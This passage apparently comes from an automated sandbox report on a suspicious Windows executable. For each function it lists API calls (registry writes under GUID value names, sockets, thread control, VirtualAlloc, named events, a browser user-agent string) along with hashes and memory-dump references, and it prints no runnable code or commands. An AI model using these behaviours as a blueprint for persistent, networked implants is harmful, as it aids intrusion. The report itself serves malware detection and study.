                                                                            • RegSetValueExW.ADVAPI32(000017FC,{C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD},00000000,00000003,008334D4,007C45E8), ref: 007C46D4
                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 007C46E2
                                                                            • RegCloseKey.ADVAPI32(000017FC), ref: 007C46F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}
                                                                            • API String ID: 749045061-3800169908
                                                                            • Opcode ID: 4ed3440443d8d0f6c32ba34e1a976b5bc322f79a01f4cf667c932465c227e5c8
                                                                            • Instruction ID: 014fd10a9dc72673a49345ff3bc222974592b3ea0ce6886ddd1620b06783eba9
                                                                            • Opcode Fuzzy Hash: 4ed3440443d8d0f6c32ba34e1a976b5bc322f79a01f4cf667c932465c227e5c8
                                                                            • Instruction Fuzzy Hash: 5B11C875740308FBE724DBB4EC8AFAA7378AB48F00F104448BB05EA1C1E6B59B109794
                                                                            Function 007C5090 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 55registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C50B0
                                                                            • __snwprintf.LIBCMT ref: 007C50CE
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 007C50F5
                                                                            • RegSetValueExW.ADVAPI32(?,{D4D7F2EA-38C9-468B-BF0E-B76E00A488F0},00000000,00000003,?,00000B3C), ref: 007C5115
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C5123
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C5134
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                                                                            • API String ID: 749045061-3591707405
                                                                            • Opcode ID: 13cb38fa9fa7125cbd9420332803674c39e3b336e294ee688b53608096f15df1
                                                                            • Instruction ID: bbe9a64810e5c47339573c5857d2381239995f367da1b3bf6fe085da3803ce3d
                                                                            • Opcode Fuzzy Hash: 13cb38fa9fa7125cbd9420332803674c39e3b336e294ee688b53608096f15df1
                                                                            • Instruction Fuzzy Hash: 3C11C87475030CBBE724D7B0DC4EFAA7378BB44F00F504548B704AA2C0E6B5AB409794
                                                                            Function 007C6AC0 Relevance: 13.8, APIs: 9, Instructions: 253memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C6B42
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C6C3D
                                                                              • Part of subcall function 007E0950: WSACreateEvent.WS2_32 ref: 007E09B0
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C6C9A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DE6
                                                                              • Part of subcall function 007C8A80: LocalFree.KERNEL32(00000000), ref: 007C8AE0
                                                                              • Part of subcall function 007C8A80: LocalFree.KERNEL32(00000000), ref: 007C8AF0
                                                                              • Part of subcall function 007C8A80: LocalAlloc.KERNEL32(00000040,00030010), ref: 007C8B3B
                                                                              • Part of subcall function 007C8A80: LocalAlloc.KERNEL32(00000040,00008AD0), ref: 007C8B55
                                                                              • Part of subcall function 007C8A80: _memmove.LIBCMT ref: 007C8B76
                                                                              • Part of subcall function 007C8A80: lstrcpyW.KERNEL32(00000000,00000000), ref: 007C8B86
                                                                              • Part of subcall function 007C8A80: lstrcpyW.KERNEL32(-00010000,00000000), ref: 007C8B99
                                                                              • Part of subcall function 007C8A80: lstrcpyW.KERNEL32(-00020000,00000000), ref: 007C8BAD
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                              • Part of subcall function 007C9400: LocalAlloc.KERNEL32(00000040,007C6D26,?,007C6D8A,00000000,00000000,?), ref: 007C9416
                                                                              • Part of subcall function 007C9400: _memmove.LIBCMT ref: 007C9435
                                                                              • Part of subcall function 007C9400: lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 007C94FF
                                                                              • Part of subcall function 007C9400: StrStrIW.SHLWAPI(?,.DLL), ref: 007C9511
                                                                              • Part of subcall function 007C9400: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007C953C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DAD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DBA
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C6DFC
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C6E68
                                                                            • closesocket.WS2_32(?), ref: 007C6E72
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFree$lstrcpy$CreateInfoLocale___crt_memmovewnsprintf$EventFileclosesocketsetsockoptshutdown
                                                                            • String ID:
                                                                            • API String ID: 3185571019-0
                                                                            • Opcode ID: 3b3621269276443db3ca1223972fd66a7437a60e3a73e039ef12e0e3d42c10a5
                                                                            • Instruction ID: bb91c880b029dff92079fd1b53f0e98e3770acd8135acf0bb3409e5768bae1db
                                                                            • Opcode Fuzzy Hash: 3b3621269276443db3ca1223972fd66a7437a60e3a73e039ef12e0e3d42c10a5
                                                                            • Instruction Fuzzy Hash: 96B10FB5E00218AFEB24DB94CC85FEEB778BB48300F10859DE619A7281D7755A84CFA1
                                                                            Function 007D79F0 Relevance: 13.7, APIs: 9, Instructions: 176stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • _memmove.LIBCMT ref: 007D7A48
                                                                            • lstrlenW.KERNEL32(?), ref: 007D7A6C
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007D7A7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$AllocLocal_memmove
                                                                            • String ID:
                                                                            • API String ID: 39496755-0
                                                                            • Opcode ID: 9bc30a87fca97ee193dd98680f870b96f0445de18033c47730115b99af3cb3d3
                                                                            • Instruction ID: 37f632be823020ea239104815396722e19a7fa02884e8835d654111881648c12
                                                                            • Opcode Fuzzy Hash: 9bc30a87fca97ee193dd98680f870b96f0445de18033c47730115b99af3cb3d3
                                                                            • Instruction Fuzzy Hash: 84710BB4A0410AEFCB08CF98D495EEEB7B1FF48304F10855AE905A7351E738AA55CFA0
                                                                            Function 007D7D60 Relevance: 13.7, APIs: 9, Instructions: 171stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$AllocLocal_memmove
                                                                            • String ID:
                                                                            • API String ID: 39496755-0
                                                                            • Opcode ID: dab1a47b9357d0ae6be6e931dc1ec55a14d7c66056099be01f7771a2d9aaa004
                                                                            • Instruction ID: c66ff33e33aedc472ed05a411d2b9cb1017d703414d317cd24b5828ef6c2b29b
                                                                            • Opcode Fuzzy Hash: dab1a47b9357d0ae6be6e931dc1ec55a14d7c66056099be01f7771a2d9aaa004
                                                                            • Instruction Fuzzy Hash: E471EB75A0410ADFCF18CF98D985BAEB7B2FF48304F108559E905A7341E738AE51DBA4
                                                                            Function 007DEBC0 Relevance: 13.7, APIs: 9, Instructions: 158memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007DEC09
                                                                            • und_memcpy.LIBCMTD ref: 007DEC2F
                                                                            • und_memcpy.LIBCMTD ref: 007DEC4A
                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 007DEC68
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DEC84
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocalund_memcpy$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616075706-0
                                                                            • Opcode ID: d21baedd2bd788e4408c49b74358b08db4af1dca9fb56c12945d572a86370914
                                                                            • Instruction ID: 8372f3d8bfaf64c20ea03ff88c58980119dec020ac493067dbe29cefd1016f9c
                                                                            • Opcode Fuzzy Hash: d21baedd2bd788e4408c49b74358b08db4af1dca9fb56c12945d572a86370914
                                                                            • Instruction Fuzzy Hash: F971D0B5A00228DBCB64DF54DC88BEDB7B5AF98305F1481D9E50DAB351DA34AEC18F40
                                                                            Function 007DC240 Relevance: 13.6, APIs: 9, Instructions: 95threadmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 007DC24A
                                                                            • CreateThread.KERNEL32(00000000,00000000,007DC360,00000000,00000000,00000000), ref: 007DC291
                                                                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 007DC2EB
                                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 007DC302
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC311
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC31B
                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 007DC336
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DC340
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC34A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalThread$CloseFreeHandle$AllocCodeCreateExitMultipleObjectsTerminateWait
                                                                            • String ID:
                                                                            • API String ID: 872497719-0
                                                                            • Opcode ID: cadcb689f2778f64120627e94912597bbddc197cee1b67432eefdec330d2e18e
                                                                            • Instruction ID: 29422f9d9396c758c7828d61037d7fc0071725b320a0669755bf1d88398f3b1c
                                                                            • Opcode Fuzzy Hash: cadcb689f2778f64120627e94912597bbddc197cee1b67432eefdec330d2e18e
                                                                            • Instruction Fuzzy Hash: D541C479A00208EFCB04DF94D984BADBBB6FB48300F208159E905A7395DB38AA41CF54
                                                                            Function 007C4800 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 238synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(000002EC,00000000), ref: 007C4822
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C48A9
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C4ADE
                                                                            • WaitForSingleObject.KERNEL32(000002EC,00001388), ref: 007C4B8C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C4BED
                                                                            Strings
                                                                            • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, xrefs: 007C499C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$ObjectSingleWait
                                                                            • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                            • API String ID: 1287375803-4002695862
                                                                            • Opcode ID: 09502354b80a4e01c2ea8c6f4c3940405026bb835f2da2159c2a50810eef8f6c
                                                                            • Instruction ID: b934d2b78fe0edf30331b7e6554572c49b7993251e60d14d3080beb07a3f32dd
                                                                            • Opcode Fuzzy Hash: 09502354b80a4e01c2ea8c6f4c3940405026bb835f2da2159c2a50810eef8f6c
                                                                            • Instruction Fuzzy Hash: 58C13AF1E01209CBDB08CF81C5A9BADBBB1FBE4304F25826DD60AAF295C7795945CB44
                                                                            Function 007D74C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,007D720B,?), ref: 007D74EB
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7523
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7543
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007D720B,?), ref: 007D755B
                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 007D757A
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D75A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 3200977696-2564639436
                                                                            • Opcode ID: 7cf1aa88d3450927a9d332d2d8773acf970e86653187f977dec44143f0ee9c4b
                                                                            • Instruction ID: b6d39b817c69e4e90b568c62372dcf41fc11d475e2f1c61d607b550a052589ab
                                                                            • Opcode Fuzzy Hash: 7cf1aa88d3450927a9d332d2d8773acf970e86653187f977dec44143f0ee9c4b
                                                                            • Instruction Fuzzy Hash: 59315AB4A04209DFDB18CF94D888BAEB7B2FF48304F24C559E51667390D779A981CF90
                                                                            Function 007CE020 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CE08F
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CE0CA
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CE0DD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CE0E7
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CE0F3
                                                                            • closesocket.WS2_32(?), ref: 007CE0FD
                                                                              • Part of subcall function 007CB6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB70C
                                                                              • Part of subcall function 007CB6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                              • Part of subcall function 007CB6D0: __snwprintf.LIBCMT ref: 007CB74E
                                                                              • Part of subcall function 007CB6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB77C
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007CE0BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CreateErrorEventFreeLast$AllocCloseDirectoryFileHandleOpen__snwprintfclosesocketsetsockoptshutdown
                                                                            • String ID: {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 1062739783-1105423733
                                                                            • Opcode ID: ae8cc7b1a1b97274811e55293f59ceaf0f15c06f7b9e7d2fd96cb452f7b7c384
                                                                            • Instruction ID: 4b6515c9c92e369362f7fb32fff265ac2d8a9893d526cd8ef6606be19b1b4315
                                                                            • Opcode Fuzzy Hash: ae8cc7b1a1b97274811e55293f59ceaf0f15c06f7b9e7d2fd96cb452f7b7c384
                                                                            • Instruction Fuzzy Hash: 9231FC70A00218EFDB24DFA4D849FADBBB5FB88700F208A2CF510A7291D7B59944CF91
                                                                            Function 007C4320 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007C4331
                                                                            • OpenEventW.KERNEL32(00000002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007C4383
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C4396
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C43A0
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C43D8
                                                                            • ResetEvent.KERNEL32(00000000), ref: 007C43FB
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007C437A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
